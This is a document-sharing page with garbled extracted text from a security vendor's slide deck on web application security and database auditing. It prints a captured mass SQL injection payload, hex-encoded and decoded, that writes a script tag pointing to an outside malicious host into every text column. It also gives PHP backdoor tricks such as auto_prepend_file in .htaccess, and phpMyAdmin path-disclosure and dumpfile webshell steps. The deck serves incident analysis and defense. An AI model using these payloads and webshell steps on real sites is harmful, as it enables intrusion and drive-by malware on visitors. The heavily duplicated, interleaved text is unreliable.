书签分享收藏举报版权申诉 / 66

立即下载

当前位置：首页 > 生活休闲 > 生活常识 > Web Application Security and Database Audit Miscs.ppt

Web Application Security and Database Audit Miscs.ppt

上传人：s****8

文档编号：67338561

上传时间：2022-12-24

格式：PPT

页数：66

大小：1.88MB

( 4.5 )

《Web Application Security and Database Audit Miscs.ppt》由会员分享，可在线阅读，更多相关《Web Application Security and Database Audit Miscs.ppt（66页珍藏版）》请在淘文阁 - 分享文档赚钱的网站上搜索。

1、Web Application Security and Web Application Security and Database Audit MiscsDatabase Audit MiscsDBAPPSecurity IncDBAPPSecurity Inc杭州安恒信息技术有限公司杭州安恒信息技术有限公司FrankdbappSFrankdbappSFrank.F主讲人主讲人Frank.FanFrank.Fan范渊范渊杭州安恒信息技术有限公司杭州安恒信息技术有限公司DBAPPSecurity IncDBAPPSecurity IncFounder and CTOFounder and CT

2、O毕业于美国加州大学计算机科学方向硅谷国际著名安全公司从事十多年的技术研发和项目管理对应用安全、数据库安全和审计、compliance(如SOX,PCI,ISO17799/27001)有着非常资深经验第一个登上全球最权威黑帽子安全大会演讲的中国人CISSP,CISA,GCIH,GCIAOWASP中国分会副会长2008北京奥组委安全组成员浙江省信息安全协会安全服务委员会负责人本期要点：本期要点：FWebWeb应用安全挑战和分析应用安全挑战和分析F数据库审计数据库审计安全风险安全风险+管理风险管理风险 -审计审计主要内容主要内容F公司简介公司简介F数据库安全审计概念数据库安全审计概念F各类规范要

3、求和数据库审计系统需求分析各类规范要求和数据库审计系统需求分析F明御数据库审计与风险控制系统明御数据库审计与风险控制系统F案例分析案例分析F小结小结2008北京奥组委安全产品和服务提供商北京奥组委安全产品和服务提供商作为2008北京奥组委安全产品和服务提供商，2008年9月安恒信息被2008北京奥运会组委会授予08奥运安全保障杰出贡献奖。Many Incident Handling Support安恒机密.|7黑客产业链黑客产业链入侵者入侵者入侵企业入侵企业服务器服务器窃取机密信息窃取机密信息(图纸、财务报图纸、财务报表等）表等）出售出售收费传播流氓软件获取金获取金钱钱拒绝服务攻击发送垃圾邮件

4、批量入批量入侵网站侵网站盗取银行帐号盗取银行帐号盗取银行帐号盗取银行帐号盗取信用卡帐号盗取信用卡帐号盗取信用卡帐号盗取信用卡帐号盗取证券交易帐号盗取证券交易帐号盗取证券交易帐号盗取证券交易帐号盗取虚拟财产盗取虚拟财产盗取虚拟财产盗取虚拟财产组建僵尸网络组建僵尸网络组建僵尸网络组建僵尸网络洗钱洗钱主动攻击勒索网站受雇攻击收取佣金安恒机密.|8F总共检测网站近总共检测网站近700700家家F90%90%网站存在严重安全隐患网站存在严重安全隐患F部分网站已经被挂马或被黑客控制部分网站已经被挂马或被黑客控制AgendaAgendaFMass Injection Attack Tool Revealed

5、Mass Injection Attack Tool RevealedFPHP Backdoor TipsPHP Backdoor TipsFSome hacking tips about phpmydaminSome hacking tips about phpmydamin9Mass Injection Tool RevealedMass Injection Tool RevealedFHow did We find it?How did We find it?From a Bot Machine during Incident Handling From a Bot Machine du

6、ring Incident Handling10Real case in incident handling!Real case in incident handling!F2008-05-13 00:28:25 W3SVC628249937 22.1.1.11 POST/news_default.asp 2008-05-13 00:28:25 W3SVC628249937 22.1.1.11 POST/news_default.asp tid=117;DECLARE%20S%20NVARCHAR(4000);SET%20S=CAST(0 x4400450043004C004100520045

7、00200040005tid=117;DECLARE%20S%20NVARCHAR(4000);SET%20S=CAST(0 x4400450043004C0041005200450020004000540020007600610072006300680061007200280032003500350029002C004000430020007600610072006300680040020007600610072006300680061007200280032003500350029002C004000430020007600610072006300680061007200280032003

8、5003500290020004400450043004C0041005200450020005400610062006C0065005F00430610072002800320035003500290020004400450043004C0041005200450020005400610062006C0065005F0043007500720073006F007200200043005500520053004F005200200046004F0052002000730065006C00650063007407500720073006F007200200043005500520053004F0

9、05200200046004F0052002000730065006C00650063007400200061002E006E0061006D0065002C0062002E006E0061006D0065002000660072006F006D00200073007900700200061002E006E0061006D0065002C0062002E006E0061006D0065002000660072006F006D0020007300790073006F0062006A006500630074007300200061002C0073007900730063006F006C007500

10、6D006E007300200062003006F0062006A006500630074007300200061002C0073007900730063006F006C0075006D006E00730020006200200077006800650072006500200061002E00690064003D0062002E0069006400200061006E006400200061002E0200077006800650072006500200061002E00690064003D0062002E0069006400200061006E006400200061002E00780074

11、007900700065003D00270075002700200061006E0064002000280062002E00780074007900700065003D0780074007900700065003D00270075002700200061006E0064002000280062002E00780074007900700065003D003900390020006F007200200062002E00780074007900700065003D003300350020006F007200200062002E007003900390020006F007200200062002E00

12、780074007900700065003D003300350020006F007200200062002E00780074007900700065003D0032003300310020006F007200200062002E00780074007900700065003D003100360080074007900700065003D0032003300310020006F007200200062002E00780074007900700065003D00310036003700290020004F00500045004E0020005400610062006C0065005F0043007

13、500720073006F007200200046004503700290020004F00500045004E0020005400610062006C0065005F0043007500720073006F00720020004600450054004300480020004E004500580054002000460052004F004D00200020005400610062006C0065005F00430075054004300480020004E004500580054002000460052004F004D00200020005400610062006C0065005F00430

14、07500720073006F007200200049004E0054004F002000400054002C004000430020005700480049004C0045002800400720073006F007200200049004E0054004F002000400054002C004000430020005700480049004C004500280040004000460045005400430048005F005300540041005400550053003D0030002900200042004500470049004E00000400046004500540043004

15、8005F005300540041005400550053003D0030002900200042004500470049004E00200065007800650063002800270075007000640061007400650020005B0027002B00400054002B0027005D00200200065007800650063002800270075007000640061007400650020005B0027002B00400054002B0027005D00200073006500740020005B0027002B00400043002B0027005D003D

16、0072007400720069006D00280063006F006E0076073006500740020005B0027002B00400043002B0027005D003D0072007400720069006D00280063006F006E007600650072007400280076006100720063006800610072002C005B0027002B00400043002B0027005D0029002900200650072007400280076006100720063006800610072002C005B0027002B00400043002B002700

17、5D00290029002B00270027003C0073006300720069007000740020007300720063003D0068007400740070003A002F002F007700B00270027003C0073006300720069007000740020007300720063003D0068007400740070003A002F002F007700770077002E006B0069006C006C0077006F00770031002E0063006E002F0067002E006A0073003E003C002F00730770077002E006B

18、0069006C006C0077006F00770031002E0063006E002F0067002E006A0073003E003C002F007300630072006900700074003E0027002700270029004600450054004300480020004E0045005800540020004600520630072006900700074003E0027002700270029004600450054004300480020004E004500580054002000460052004F004D00200020005400610062006C0065005F0

19、043007500720073006F007200200049004E0054004F0020004004F004D00200020005400610062006C0065005F0043007500720073006F007200200049004E0054004F002000400054002C0040004300200045004E004400200043004C004F005300450020005400610062006C0065005F00430000054002C0040004300200045004E004400200043004C004F0053004500200054006

20、10062006C0065005F0043007500720073006F00720020004400450041004C004C004F00430041005400450020005400610062006C0065005F07500720073006F00720020004400450041004C004C004F00430041005400450020005400610062006C0065005F0043007500720073006F007200%20AS%20NVARCHAR(4000);EXEC(S);-80-204.13.70.223 043007500720073006F00

21、7200%20AS%20NVARCHAR(4000);EXEC(S);-80-204.13.70.223 Mozilla/3.0+(compatible;+Indy+Library)200 0 0Mozilla/3.0+(compatible;+Indy+Library)200 0 011Real contentReal contentFDECLARE T varchar(255),C varchar(255)DECLARE DECLARE T varchar(255),C varchar(255)DECLARE Table_Cursor CURSOR FOR select a.name,b.

22、name from Table_Cursor CURSOR FOR select a.name,b.name from sysobjects a,syscolumns b where a.id=b.id and sysobjects a,syscolumns b where a.id=b.id and a.xtype=u and(b.xtype=99 or b.xtype=35 or a.xtype=u and(b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167)OPEN Table_Cursor FETCH b.xtype=231 o

23、r b.xtype=167)OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO T,C NEXT FROM Table_Cursor INTO T,C WHILE(FETCH_STATUS=0)BEGIN exec(update+T+WHILE(FETCH_STATUS=0)BEGIN exec(update+T+set set+C+=rtrim(convert(varchar,+C+)+script+C+=rtrim(convert(varchar,+C+)+)FETCH src=http:/ NEXT FROM Table_Cursor

24、INTO T,C END CLOSE NEXT FROM Table_Cursor INTO T,C END CLOSE Table_Cursor DEALLOCATE Table_CursorTable_Cursor DEALLOCATE Table_Cursor12Key part:Key part:Fscript src=http:/ Injection Tool RevealedMass Injection Tool Revealed14Mass Injection Tool RevealedMass Injection Tool Revealed15Mass Injection To

25、ol-Config.iniMass Injection Tool-Config.iniFinitinitFedkey=inurl:(.aspx?-(gov)edkey=inurl:(.aspx?-(gov)自动产生自动产生 Franklimit=1000000ranklimit=1000000Fcipin=50cipin=50Ftimeout=20timeout=20Fprocess=1process=1Fretry=3retry=3Fthread=88thread=88Fbufferlength=10bufferlength=10Fcpu=115cpu=115Fsellang=0sellan

26、g=0Fscanmode=0scanmode=0Fchkbox1=1chkbox1=1Fchkbox2=0chkbox2=0Fchkbox3=1chkbox3=1Fchkbox4=0chkbox4=0Fchkbox5=1chkbox5=1Fchkbox6=0chkbox6=0Fchkbufferlength=1chkbufferlength=1Fchkranklimit=0chkranklimit=0FIgnoreUrl=#$D#$A#$D#$A#$D#$A#$D#$A#$D#$A#$D#$AhIgnoreUrl=#$D#$A#$D#$A#$D#$A#$D#$A#$D#$A#$D#$A#$D#

27、$A#$D#$A#$D#$A#$D#$A#$D#$A#$D#$A#$D#$A#$D#$A#$D#$A#$D#$A#$D#$A#$D#$A#$D#$A#$D#$A#$D#$A#$D#$A#$D#$A#$D#$AFIgnoreKey=Not Found#$D#$AIgnoreKey=Not Found#$D#$A盗链盗链#$D#$A#$D#$A文件不存在文件不存在#$D#$A#$D#$A16PHP backdoor PHP backdoor FBasename()Basename()FInclude()Include()FEval()Eval()FPreg_replace()Preg_replac

28、e()1718Basename()Basename()?php?php$fp=fopen(c:/test.php,w);$fp=fopen(c:/test.php,w);fwrite($fp,fwrite($fp,basename($_SERVERQUERY_STRING);basename($_SERVERQUERY_STRING);fclose($fp);fclose($fp);/http:/127.0.0.1/Basename.php?/http:/127.0.0.1/Basename.php?19Include()Include()Modify configuration fileMo

29、dify configuration fileFphp.iniphp.iniF.htaccess.htaccess 20Update php.iniUpdate php.ini21Update.htaccessUpdate.htaccess文件文件.htaccess .htaccess#php_value auto_prepend_file.htaccessphp_value auto_prepend_file.htaccess22Some hacking tips about phpmydaminSome hacking tips about phpmydaminF1.Get phpmyad

30、mins absolute path(Multi 1.Get phpmyadmins absolute path(Multi version support)version support)F2.Inference Variable info(mysql2.Inference Variable info(mysql related)related)F3 3、Package(default stuff)Package(default stuff)F4 4、Error info inferenceError info inferenceF5 5、phpinfophpinfo EnableEnabl

31、eF6 6、InjectionInjectionF7 7、Get webshellGet webshellGet phpmyadmins absolute pathGet phpmyadmins absolute pathhttp:/xx/phpmyadmin/themes/darkblue_orange/http:/xx/phpmyadmin/themes/darkblue_orange/layout.inc.phplayout.inc.phphttp:/xx/phpMyAdmin/index.php?lang=1http:/xx/phpMyAdmin/index.php?lang=1htt

32、p:/xx/phpmyadmin/libraries/select_lang.lhttp:/xx/phpmyadmin/libraries/select_lang.lib.phpib.phphttp:/xx/phpmyadmin/scripts/check_lang.phphttp:/xx/phpmyadmin/scripts/check_lang.phphttp:/xx/phpmyadmin/libraries/export/xls.phhttp:/xx/phpmyadmin/libraries/export/xls.php p三、三、PackagePackageFAPMServ C:APM

33、_SetupServerphpMyAdminAPMServ C:APM_SetupServerphpMyAdminFAppServ C:AppServwwwphpMyAdminAppServ C:AppServwwwphpMyAdminFXAMPP C:xamppphpMyAdminXAMPP C:xamppphpMyAdminF.七、七、Get WebshellGet WebshellUse dumpfileUse dumpfile to get webshellto get webshellReal Case used some code hardeningReal Case used s

34、ome code hardeningReal Case Cookie InjectionReal Case Cookie InjectionDefense TipsDefense TipsFWeb Application Firewall ChallengeWeb Application Firewall ChallengeFCode and Configuration hardening ChallengeCode and Configuration hardening Challenge30WebWeb Application Firewall(WAF)Application Firewa

35、ll(WAF)历史历史FWebWeb应用防火墙第一代：应用防火墙第一代：流方式流方式FWebWeb应用防火墙第二代：应用防火墙第二代：第二代第二代WebWeb应用防火墙应用防火墙F支持全透明直连部署支持全透明直连部署FHTTPSHTTPS全透明支持全透明支持FWebWeb加速功能加速功能F抗各类抗各类WebWeb攻击攻击F第二部分：数据库审计概念第二部分：数据库审计概念审计审计信息安全审计信息安全审计数据库审计数据库审计审计审计F检查、验证目标的准确性和完整性，用以防止虚假检查、验证目标的准确性和完整性，用以防止虚假数据和欺骗行为，以及是否符合既定的标准、标竿数据和欺骗行为，以及是否符合既定的

36、标准、标竿和其它审计原则和其它审计原则萨班斯法案萨班斯法案美国史上最严厉的审计法则美国史上最严厉的审计法则企企业业内内部部控控制制规规范范国国内内审审计计规规范范，主主要要目目的的在在于于加加强强和和规规范企业内部控制，提高企业经营管理水平和风险行为防范能力范企业内部控制，提高企业经营管理水平和风险行为防范能力财务审计、财务审计、ITIT审计审计信息安全审计信息安全审计信息安全审计信息安全审计F收收集集并并评评估估证证据据以以决决定定一一个个计计算算机机系系统统是是否否有有效效做做到到保保护护资资产产、维维护护数数据据完完整整、完完成成目目标标，同同时时最最经经济济的使用资源的使用资源萨萨班

37、班斯斯法法案案强强调调加加强强与与财财务务报报表表相相关关的的ITIT系系统统内内部部控控制制，其其中，中，ITIT系统内部控制是紧密围绕信息安全审计这一核心的。系统内部控制是紧密围绕信息安全审计这一核心的。巴巴赛赛尔尔新新资资本本协协定定(Basel(Basel II)II)，要要求求全全球球银银行行必必须须做做好好风风险险控控管管(risk(risk management)management)，而而这这项项“金金融融作作业业风风险险”的的防防范范正正需需要要业业务务信信息安全审计为依托。息安全审计为依托。企企业业内内部部控控制制具具体体规规范范明明确确要要求求计计算算机机信信息息系系统统

38、应应采采取取权权责责分分配配及及职职责责分分工工、建建立立访访问问安安全全策策略略等等审审计计措措施施以以加加强强提提高高信信息息系系统的可靠性、稳定性、安全性及数据的完整性和准确性。统的可靠性、稳定性、安全性及数据的完整性和准确性。ISO17799ISO17799、CCCC、PCIPCI数据库安全审计数据库安全审计F确确保保数数据据的的完完整整性性数数据据库库安安全全审审计计，通通过过对对数数据据库库安安全全性性相相关关的的操操作作进进行行审审计计，监监测测指指定定用用户户的的行行为为，掌握数据库使用状况。掌握数据库使用状况。F数据库审计是信息安全审计的重要组成部分。数据库审计是信息安全审计

39、的重要组成部分。F数据库审计的目的在于数据库审计的目的在于确保数据的完整性确保数据的完整性全面了解数据库实际发生的情况全面了解数据库实际发生的情况可可疑疑行行为为发发生生时时可可以以自自动动启启动动预预先先设设置置的的告告警警流流程程，防防范范数数据据库风险的发生库风险的发生F第三部分：数据库审计系统需求分析第三部分：数据库审计系统需求分析安全需求分析安全需求分析数据库安全攻击事件正在升级数据库安全分析现有安全解决方案无法有效应对数据库攻击行为相关法律法规相关法律法规数据库审计系统应满足的要求数据库审计系统应满足的要求F数据库安全攻击事件数据库安全攻击事件某系统开发工程师通过互联网入侵移动中心

40、数据库，盗取冲值卡某系统开发工程师通过互联网入侵移动中心数据库，盗取冲值卡某医院数据库系统遭到非法入侵，导致上万名患者私隐信息被盗取某医院数据库系统遭到非法入侵，导致上万名患者私隐信息被盗取某某网网游游公公司司内内部部数数据据库库管管理理人人员员通通过过违违规规修修改改数数据据库库数数据据盗盗窃窃网网游游点点卡卡黑黑客客利利用用SQLSQL注注入入攻攻击击，入入侵侵某某防防病病毒毒软软件件数数据据库库中中心心，窃窃取取大大量量机机密信息，导致该防病毒软件公司严重损失密信息，导致该防病毒软件公司严重损失某证券交易所内部数据库造黑客股民入侵，盗窃证券交易内部报告某证券交易所内部数据库造黑客股民入侵

41、，盗窃证券交易内部报告F针对数据库进行的安全攻击事件正在升级！针对数据库进行的安全攻击事件正在升级！数据库审计系统需求分析数据库审计系统需求分析安全需求分析安全需求分析数据库安全分析数据库安全分析数据库的重要性数据库的重要性是企业数据信息的最终载体是企业业务系统的核心自然灾难自然灾难自然灾难自然灾难软件崩溃软件崩溃软件崩溃软件崩溃重装重装重装重装/升级升级升级升级/补丁补丁补丁补丁人为错误人为错误人为错误人为错误硬件和系统错误硬件和系统错误硬件和系统错误硬件和系统错误异地容灾异地容灾异地容灾异地容灾/恢复恢复恢复恢复回滚回滚回滚回滚/恢复恢复恢复恢复 RAID/RAID/备份备份备份备份

42、恶意攻击恶意攻击恶意攻击恶意攻击?数据库面临的风险数据库面临的风险内部人员误操作、内部人员误操作、违规操作、越权操违规操作、越权操作作第三方维护人员安第三方维护人员安全隐患全隐患最高权限用户操作最高权限用户操作多人共用一个帐号多人共用一个帐号员工离职后泄漏公员工离职后泄漏公司信息司信息管理风险管理风险技术风险技术风险网络层攻击网络层攻击操作系统漏洞操作系统漏洞应用程序攻击应用程序攻击数据库攻击数据库攻击应用提供商的后应用提供商的后门门离职员工的后门离职员工的后门审计风险审计风险日志缺失或不完日志缺失或不完整整安全事件难于追安全事件难于追溯或定位溯或定位复杂的业务应用复杂的业务应用复杂的业务应用

43、复杂的业务应用 +异构的网络环境异构的网络环境异构的网络环境异构的网络环境 +高度集中的信息共享高度集中的信息共享高度集中的信息共享高度集中的信息共享使企业核心数据库面临更大的安全挑战现有的安全解决方案现有的安全解决方案应用前端应用前端交换机交换机防火墙防火墙路由器路由器2/32/3层交换机层交换机WebWeb服务器服务器网络存储网络存储应用服务器应用服务器数据库服务器数据库服务器因特网因特网IDS/IPSIDS/IPS防病毒工具软件防火墙漏洞扫描软件PKI/SSO重要应用部署于防火墙内只开放需要的端口限制特殊的源地址网络监听入侵检测告警现有的安全解决方案不能有效应对现有的安全解决方案不能有效

44、应对防火墙防火墙只能检测网络层的攻击无法阻拦来自网络内部的非法操作无法动态识别或自适应地调整规则对WEB应用,端口80或443必须开放IDS/IPSIDS/IPS只检测已知特征对数据层的信息缺乏深度分析，误报/漏报率很高没有对session/user的跟踪；不能保护SSL流量针对网络层应用层攻击应用层攻击应用层攻击应用层攻击内部违规操作内部违规操作内部违规操作内部违规操作现有的网络安全防护对内部人员的违规操作无能为力现有的网络安全防护对内部人员的违规操作无能为力现有的网络安全防护对内部人员的违规操作无能为力现有的网络安全防护对内部人员的违规操作无能为力普通防火墙普通防火墙普通防火墙普通防火墙+

45、IDS/IPS +IDS/IPS 束手无策束手无策束手无策束手无策F由由于于数数据据库库本本身身的的重重要要性性以以及及脆脆弱弱性性，国国家家以以及及国国际际上上都都制制定定了了相相关关的的法法律律法法规规来来指指导导并并规规范范数数据据库库信息系统的安全建设信息系统的安全建设F其其中中最最重重要要的的是是明明确确了了独独立立数数据据库库审审计计系系统统的的必必要要性和重要性性和重要性数据库审计系统需求分析数据库审计系统需求分析相关法律法规相关法律法规F信息安全等级保护测评准则信息安全等级保护测评准则信信息息安安全全等等级级保保护护测测评评准准则则第第六六章章“第第二二级级安安全全控控制制测测

46、评评”中中第第一一节节“安全技术测评安全技术测评”主机系统安全审计中明确提出：主机系统安全审计中明确提出：安全审计应覆盖到服务器上的每个操作系统用户和数据库用户安全审计应记录系统内重要的安全相关事件，包括重要用户行为、系统资源的异常使用和重要系统命令的使用等安全相关事件的记录应包括日期和时间、类型、主体标识、客体标识、事件的结果等审计记录应受到保护避免受到未预期的删除、修改或覆盖等信信息息安安全全等等级级保保护护测测评评准准则则第第七七章章“第第三三级级安安全全控控制制测测评评”中中第一节第一节“安全技术测评安全技术测评”主机系统安全审计中明确提出：主机系统安全审计中明确提出：安全审计应覆盖到

47、应用系统的每个操作系统用户和数据库用户安全审计应记录应用系统重要的安全相关事件，包括重要用户行为、系统资源的异常使用和重要系统功能的执行等安全相关事件的记录应包括日期和时间、类型、主体标识、客体标识、事件的结果等安全审计应可以根据记录数据进行分析，并生成审计报表安全审计应可以对特定事件，提供指定方式的实时报警审计进程应受到保护避免受到未预期的中断审计记录应受到保护避免受到未预期的删除、修改或覆盖等信信息息安安全全等等级级保保护护测测评评准准则则第第七七章章“第第四四级级安安全全控控制制测测评评”中中第第一节一节“安全技术测评安全技术测评”主机系统安全审计中明确提出：主机系统安全审计中明确提出：

48、安全审计应覆盖到服务器和客户端上的所有操作系统用户和数据库用户安全审计应记录系统内重要的安全相关事件，包括重要用户行为、系统资源的异常使用和重要系统命令的使用安全相关事件的记录应包括日期和时间、类型、主体标识、客体标识、客体敏感标记、事件的结果等安全审计应可以根据记录数据进行分析，并生成审计报表安全审计应可以对特定事件，提供指定方式的实时报警审计进程应受到保护避免受到未预期的中断审计记录应受到保护避免受到未预期的删除、修改或覆盖等安全审计应能跟踪监测到可能的安全侵害事件，并终止违规进程安全审计应根据信息系统的统一安全策略，实现集中审计系统设备时钟应与时钟服务器时钟保持同步F等级保护数据库管理技

49、术要求等级保护数据库管理技术要求计算机信息系统安全等级保护数据库管理技术要求计算机信息系统安全等级保护数据库管理技术要求第四章第四章“数据库数据库管理系统安全技术要求管理系统安全技术要求”中第四节中第四节“数据库安全审计数据库安全审计”中明确提出中明确提出数据库数据库管理系统的安全审计应：管理系统的安全审计应：建立独立的安全审计系统定义与数据库安全相关的审计事件设置专门的安全审计员设置专门用于存储数据库系统审计数据的安全审计库提供适用于数据库系统的安全审计设置、分析和查阅的工具ISO ISO 体系体系FBS7799/ISO27001BS7799/ISO27001BS7799-1BS7799-1

50、（ISOISO）19991999信信息息技技术术信信息息安安全全管管理理业业务务规规范范第第十章十章“系统开发与维护系统开发与维护”中第二节中第二节“应用系统中的安全应用系统中的安全”明确提出：明确提出：为“防止应用系统中用户数据的丢失、修改或滥用”，“应用系统应设计包含适当的控制措施和审计追踪或活动日志记录，包括在用户写入的应用程序中。这些系统应包括对输入数据、内部处理和输出数据的检验功能。”BS7799-2 BS7799-2 2002 2002 信信息息技技术术信信息息安安全全管管理理系系统统规规范范第第四四章章“详详细细监监控控”中中第第七七节节“访访问问控控制制”第第7 7小小节节“监

文档加载中……请稍候！
如果长时间未打开，您也可以点击刷新试试。

下载文档到电脑，查找使用更方便

16 金币

版权申诉 word格式文档无特别注明外均可编辑修改；预览文档经过压缩，下载后原文更清晰！ 立即下载

配套讲稿：: 如PPT文件的首页显示word图标，表示该PPT已包含配套word讲稿。双击word图标可打开word文档。
特殊限制：: 部分文档作品中含有的国旗、国徽等图片，仅作为作品整体效果示例展示，禁止商用。设计者仅对作品中独创性部分享有著作权。
关键词：: Web Application Security and Database Audit Miscs

淘文阁 - 分享文档赚钱的网站所有资源均是用户自行上传分享，仅供网友学习交流，未经上传用户书面授权，请勿作他用。

限制150内

关于本文

本文标题：Web Application Security and Database Audit Miscs.ppt
链接地址：https://www.taowenge.com/p-67338561.html